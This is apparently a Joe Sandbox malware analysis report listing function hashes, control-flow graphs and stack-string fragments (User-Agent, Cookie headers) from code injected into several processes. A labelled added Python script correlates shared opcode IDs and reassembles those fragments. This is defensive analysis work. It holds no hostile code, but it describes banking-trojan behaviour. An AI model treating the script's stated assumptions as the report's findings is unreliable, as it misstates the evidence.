• Instruction Fuzzy Hash: 62219031908216AFEB119F78C844B5DBFB6EF04700F054219FE55BB5A4DB70E810CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 70 1ff14de-1ff1590 call 1ff3653 call 1ff0c9c call 1ff1345 * 6
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction ID: 3b238f65e0d816864b808b707de84d9110065cce9cd42991d4942a38500817d6
• Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction Fuzzy Hash: B911BC72404615DEEF03AF60C9C8CAA73ECEE40604B45096E9E85EF459FEB19164CEE5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 88 1ff3f0d-1ff3f29 call 1ff3653 call 1ff379f 93 1ff3f3b-1ff3f66 call 1ff3f78 * 3 88->93 94 1ff3f2b-1ff3f39 call 1ff401b 88->94 107 1ff3f71 93->107 101 1ff3f76-1ff3f77 94->101 107->101 108 1ff3f71 call 1ff3f78 107->108 108->101
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction ID: 0b987fa3a4d5acf9e0e638d1da2115ed4cd13df4763786a0928d299e6ad6f779
• Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction Fuzzy Hash: 39F08274598241A6FF403F708C496093AB47F60705F040098ABC9BD0F4CEB15551CE70
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 134 1ff4675-1ff468d call 1ff3a1c 137 1ff468f-1ff4698 call 1ff3a6e 134->137 138 1ff469d-1ff46cd 134->138 137->138 141 1ff47e7-1ff47ec 138->141 142 1ff46d3-1ff46f5 138->142 142->141 144 1ff46fb-1ff4720 142->144 146 1ff4738-1ff475a 144->146 147 1ff4722-1ff4737 144->147 149 1ff47bf-1ff47c9 146->149 150 1ff475c-1ff477e 146->150 147->146 151 1ff47cb-1ff47dd call 1ff3673 149->151 152 1ff47e0-1ff47e5 149->152 150->149 156 1ff4780-1ff47a2 150->156 151->152 152->141 156->149 158 1ff47a4-1ff47bc 156->158 158->149
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: e571af989efc4ff1608e4dafaaca01c321a614f031cce3ebd8c68e7d8232835a
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: CA4161B6900208FFEF125F69CC48BDEBFB9FF80704F154069EA44AA264D7759644CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 109 1ff4674-1ff4680 110 1ff468b-1ff468d 109->110 111 1ff4686 call 1ff3a1c 109->111 112 1ff468f-1ff4698 call 1ff3a6e 110->112 113 1ff469d-1ff46cd 110->113 111->110 112->113 116 1ff47e7-1ff47ec 113->116 117 1ff46d3-1ff46f5 113->117 117->116 119 1ff46fb-1ff4720 117->119 121 1ff4738-1ff475a 119->121 122 1ff4722-1ff4737 119->122 124 1ff47bf-1ff47c9 121->124 125 1ff475c-1ff477e 121->125 122->121 126 1ff47cb-1ff47dd call 1ff3673 124->126 127 1ff47e0-1ff47e5 124->127 125->124 131 1ff4780-1ff47a2 125->131 126->127 127->116 131->124 133 1ff47a4-1ff47bc 131->133 133->124
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 31598023da68bc81c7b61b0384cf365341876fa5fa51c7c2d0223e9a88a7ff90
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: FC4161B6900208FFEF129F65CC44BEEBFBAFF80704F154069EA44AA264D7759640CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 0 263093e-263095f call 2630cc4 call 26314bc call 2633cc0 8 2630967-2630989 0->8 10 2630af1-2630af2 8->10 11 263098f-26309d2 call 26309d9 8->11 15 26309d4-26309d5 11->15 16 2630a3d-2630a80 11->16 17 26309d7-26309e8 call 2633653 15->17 18 2630a3c 15->18 22 2630a82-2630aae 16->22 23 2630aec call 2630af3 16->23 17->23 29 26309ee-2630a10 17->29 18->16 22->23 27 2630ab0-2630abc 22->27 23->10 31 2630ac1-2630ae5 27->31 29->23 33 2630a16-2630a3b 29->33 31->10 37 2630ae7-2630aea 31->37 33->18 33->23 37->23 37->31
Memory Dump Source
• Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: d97159d6e993760e49e9dc721a4804c8ede456f07546ed64e54629e9f12f2516
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: C7517E316442549FEB239F20CC85B9A77BCAF04744F0401D9EA49FE1D6DBB09694CB69
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 38 26314bc-2631590 call 26314de call 2630c9c call 2631345 * 6
Memory Dump Source
• Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction ID: 62c407d0e037ba372b2ca73e4e6c54abfbe99613442f0c32260c83b641de3f32
• Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction Fuzzy Hash: 57210C724046149EEF03AF60C9C8CA673ECEF41704F4509AA9D89EF049FE709554CEEA
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 57 2631345-2631352 58 26313eb-26313ec 57->58 59 2631358-263135e 57->59 59->58 60 2631364-263137a 59->60 60->58 62 263137c-263138f 60->62 64 2631391-2631398 62->64 65 263139b-26313ab call 2630e7c 64->65 68 26313ad-26313e2 65->68 68->58
Memory Dump Source
• Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: c7d84caa2f3dbb54a079b68f783be2200231a9e5b47ff059d1dcf0838b11a3e7
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 6221D231A04216AFEF12DF78C844B5DBBB5AF05700F054255FD59BB694DB30E900CBA4
Uniqueness
Uniqueness Score: -1.00%

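Added example, not part of the Joe Sandbox report and not code from the sample: a small Python parser for the record format listed above. It reads a constructed, condensed copy of three of the records (only the fields it uses are kept), reports Opcode IDs that recur across different memory dumps (the same function body e6710b31... appears in process 42 at 0x1FF0000 and in process 43 at 0x2630000, i.e. the same injected code runs in both processes), and reassembles the fragments under String ID ("-Age$Cook$User$ie: $nt:") into the HTTP header names they spell. Two assumptions are made that the report does not state: each String ID entry is one 4-byte immediate of a stack-built string, and the process number is the first dotted field of the dump name (consistent with the hcaresult_42 / hcaresult_43 snapshot names). KNOWN_STRINGS is an assumed dictionary of strings a browser-hooking banker builds on the stack; it is not taken from the report.

```python
"""Added example (not Joe Sandbox or Tinba code): parse the function
records above, find Opcode IDs present in more than one memory dump,
and reassemble the 4-byte stack-string fragments of a 'String ID'
field into the HTTP header names they spell."""

import re
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed input: three records condensed from the listing above,
# keeping only the fields this script reads.
LISTING = """\
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Similarity
• String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Similarity
• String ID: -Age$Cook$User$ie: $nt:
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
Memory Dump Source
• Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
Similarity
• String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
"""

# Assumption: strings a browser-hooking banker builds on the stack;
# extend the list for other targets. Not taken from the report.
KNOWN_STRINGS = ["User-Agent: ", "Cookie: ", "Content-Length: ", "Host: "]

CHUNK = 4  # one DWORD immediate carries four ASCII bytes (assumption)
FIELD_RE = re.compile(r"^• ([^:]+): ?(.*)$")


def parse_records(text: str) -> List[Dict[str, str]]:
    """One dict per 'Memory Dump Source' block, keyed by bullet label."""
    records: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            records.append({})
            continue
        m = FIELD_RE.match(line)
        if m and records:
            records[-1][m.group(1)] = m.group(2)
    return records


def dump_process(record: Dict[str, str]) -> int:
    """Process number from the dump name (0000002A... -> 42), matching
    the hcaresult_42_... snapshot name in the same record."""
    dump_name = record["Source File"].split(",")[0]
    return int(dump_name.split(".")[0], 16)


def shared_opcode_ids(records: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Opcode IDs whose function body shows up in more than one process."""
    seen: Dict[str, set] = defaultdict(set)
    for r in records:
        if r.get("Opcode ID"):
            seen[r["Opcode ID"]].add(dump_process(r))
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def parse_fragments(field: str) -> List[str]:
    """'$'-separated fragments; trailing spaces are unreliable because the
    report trims the last entry, so callers compare with rstrip()."""
    return [f for f in field.split("$") if f]


def tile(target: str, fragments: List[str]) -> Optional[List[str]]:
    """Ordered fragments that cover `target` chunk by chunk, else None."""
    pool = {f.rstrip() for f in fragments}
    parts: List[str] = []
    for i in range(0, len(target), CHUNK):
        chunk = target[i:i + CHUNK].rstrip()
        if chunk not in pool:
            return None
        parts.append(chunk)
    return parts


def decode_string_ids(records: List[Dict[str, str]],
                      known: List[str] = KNOWN_STRINGS) -> Dict[str, List[str]]:
    """Known strings that the fragments of some record fully tile."""
    found: Dict[str, List[str]] = {}
    for r in records:
        frags = parse_fragments(r.get("String ID", ""))
        for s in known:
            parts = tile(s, frags)
            if parts is not None:
                found[s] = parts
    return found


if __name__ == "__main__":
    recs = parse_records(LISTING)
    for oid, pids in shared_opcode_ids(recs).items():
        print(f"{oid[:16]}... present in processes {pids}")
    for s, parts in decode_string_ids(recs).items():
        print(f"{s!r} <- {' + '.join(repr(p) for p in parts)}")
```

Feeding the full report text to parse_records works the same way, since only the "Memory Dump Source" marker and the bulleted "Label: value" lines are read; the control_flow_graph edge lists and the other headings are ignored.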
Control-flow Graph
control_flow_graph 69 26314de-2631590 call 2633653 call 2630c9c call 2631345 * 6
Memory Dump Source
• Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction ID: 4b0e57a3d443d27c14945c7e50721c76b54bccdebdb575d6f22000506c12ec4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A1186724046149EEF03AF60C5C8CAA73ECEF41708B4509AE9D89EF449FE719154CEE9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 87 2633f0d-2633f29 call 2633653 call 263379f 92 2633f3b-2633f66 call 2633f78 * 3 87->92 93 2633f2b-2633f39 call 263401b 87->93 106 2633f71 92->106 101 2633f76-2633f77 93->101 106->101 107 2633f71 call 2633f78 106->107 107->101
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction ID: 0834c268b7b74bcd1d5820c5794c8b3633a6835d8a09433a703c84c1926caaf5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction Fuzzy Hash: F4F01C70588280AAFF423FB08C4965936B9AF40786F4405DDAA89ED2D5DE7085608EF9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 133 2634675-263468d call 2633a1c 136 263468f-2634698 call 2633a6e 133->136 137 263469d-26346cd 133->137 136->137 140 26346d3-26346f5 137->140 141 26347e7-26347ec 137->141 140->141 143 26346fb-2634720 140->143 145 2634722-2634737 143->145 146 2634738-263475a 143->146 145->146 148 26347bf-26347c9 146->148 149 263475c-263477e 146->149 150 26347e0-26347e5 148->150 151 26347cb-26347dd call 2633673 148->151 149->148 154 2634780-26347a2 149->154 150->141 151->150 154->148 157 26347a4-26347bc 154->157 157->148
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 9e2cab7832aa77dfb5d46ffda19535afe7fece06bcb827bddafcb1d7fc677167
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F4163B6500208BFEF125FA5CC48BDEBFBAEF84704F154069EA44AA254DB34D650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 108 2634674-2634680 109 263468b-263468d 108->109 110 2634686 call 2633a1c 108->110 111 263468f-2634698 call 2633a6e 109->111 112 263469d-26346cd 109->112 110->109 111->112 115 26346d3-26346f5 112->115 116 26347e7-26347ec 112->116 115->116 118 26346fb-2634720 115->118 120 2634722-2634737 118->120 121 2634738-263475a 118->121 120->121 123 26347bf-26347c9 121->123 124 263475c-263477e 121->124 125 26347e0-26347e5 123->125 126 26347cb-26347dd call 2633673 123->126 124->123 129 2634780-26347a2 124->129 125->116 126->125 129->123 132 26347a4-26347bc 129->132 132->123
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: dbde3d8a23a15ebec385b8f064784cf0b27d28e7c61d160758b43b25961ca33f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E4153B6500208BFEF129FA5CC84BDEBBBAEF84704F154059EA44AA254DB349650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 81093e-81095f call 810cc4 call 8114bc call 813cc0 8 810967-810989 0->8 10 810af1-810af2 8->10 11 81098f-8109d2 call 8109d9 8->11 15 8109d4-8109d5 11->15 16 810a3d-810a76 11->16 17 8109d7-8109e8 call 813653 15->17 18 810a3c 15->18 19 810a7e-810a80 16->19 22 810aec call 810af3 17->22 30 8109ee-810a10 17->30 18->16 21 810a82-810aae 19->21 19->22 21->22 27 810ab0-810abc 21->27 22->10 31 810ac1-810ae5 27->31 30->22 34 810a16-810a3b 30->34 31->10 37 810ae7-810aea 31->37 34->22 38 810a41-810a76 34->38 37->22 37->31 38->19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 193f54a461ee22958edba624c7bec52abd32e53d98dda853fdfa95253aec388a
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 175150316443549FEB125F60CC85B9977BCFF04744F040199BA45FE0D6DAB09AD4CE66
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 39 8114bc-8114df call 8114de 42 8114e1-811500 call 810c9c 39->42 43 811502-811590 call 811345 * 6 39->43 42->43
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                          • Instruction ID: cea91fbe97ee74291821fabfc619cd6afc527543ab57d4e38d0ce671c948162c
                                                                                                                                                                          • Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E210E724046149EDF03AF60C9C9CE673ECFF40704F45056AAE85EF44AFA749194CAE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 59 811345-811352 60 811358-81135e 59->60 61 8113eb-8113ec 59->61 60->61 62 811364-81137a 60->62 62->61 64 81137c-81138f 62->64 66 811391-811398 64->66 67 81139b-8113ab call 810e7c 66->67 70 8113ad-8113e2 67->70 70->61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: e5d73c6dfc00810bf1d332ad514b716431d6cc3a42d87a7d08ed0fb7c11739cd
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 46218E3190421AAFDF119E78C849B9DBBB9FF04700F054215FA65FB695D770A810CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 71 8114de-811590 call 813653 call 810c9c call 811345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction ID: 18e119194ac07ce96fb614914b257255aea164d3700f50e5036dd8cf8a1800fd
• Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction Fuzzy Hash: 66117D724045149EEF03AF64C5C98EA73ECFF40704B45096AAD85EF84EFE749194CAE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 90 813f0d-813f29 call 813653 call 81379f 95 813f3b-813f66 call 813f78 * 3 90->95 96 813f2b-813f39 call 81401b 90->96 109 813f71 95->109 103 813f76-813f77 96->103 109->103 110 813f71 call 813f78 109->110 110->103
Memory Dump Source
• Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 6f41db46181ac2ab4a69ef4d4811938c4b8cb3fd74fd25594033d9e7f96721c0
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: CDF01C70988644ABEF403BB48C4B6993ABCFF50745F040591BA8AED0D6DE7086D19E76
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 136 814675-81468d call 813a1c 139 81469d-8146cd 136->139 140 81468f-814698 call 813a6e 136->140 143 8146d3-8146f5 139->143 144 8147e7-8147ec 139->144 140->139 143->144 146 8146fb-814720 143->146 148 814722-814737 146->148 149 814738-81475a 146->149 148->149 151 81475c-81477e 149->151 152 8147bf-8147c9 149->152 151->152 157 814780-8147a2 151->157 153 8147e0-8147e5 152->153 154 8147cb-8147dd call 813673 152->154 153->144 154->153 157->152 160 8147a4-8147bc 157->160 160->152
Strings
Memory Dump Source
• Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 6ac904193c9c1ce5ba3d7d9b1469b0333c410c058c25657fd97bb2c8e4e9f5fe
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 014161B6500208BFEF125F65CC48BEEBBBDFF80704F154469EA44EA294D7309A84CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 111 814674-814680 112 81468b-81468d 111->112 113 814686 call 813a1c 111->113 114 81469d-8146cd 112->114 115 81468f-814698 call 813a6e 112->115 113->112 118 8146d3-8146f5 114->118 119 8147e7-8147ec 114->119 115->114 118->119 121 8146fb-814720 118->121 123 814722-814737 121->123 124 814738-81475a 121->124 123->124 126 81475c-81477e 124->126 127 8147bf-8147c9 124->127 126->127 132 814780-8147a2 126->132 128 8147e0-8147e5 127->128 129 8147cb-8147dd call 813673 127->129 128->119 129->128 132->127 135 8147a4-8147bc 132->135 135->127
Strings
Memory Dump Source
• Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: f4b885dfc6e92519a4d14edd097611dea836544ecbc21365cff420756cbb7cf9
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 1C4153B6500208BFEF129F65CC44BEEBBB9FF84704F154459EA44EA254D7349A84CB94
Uniqueness

Uniqueness Score: -1.00%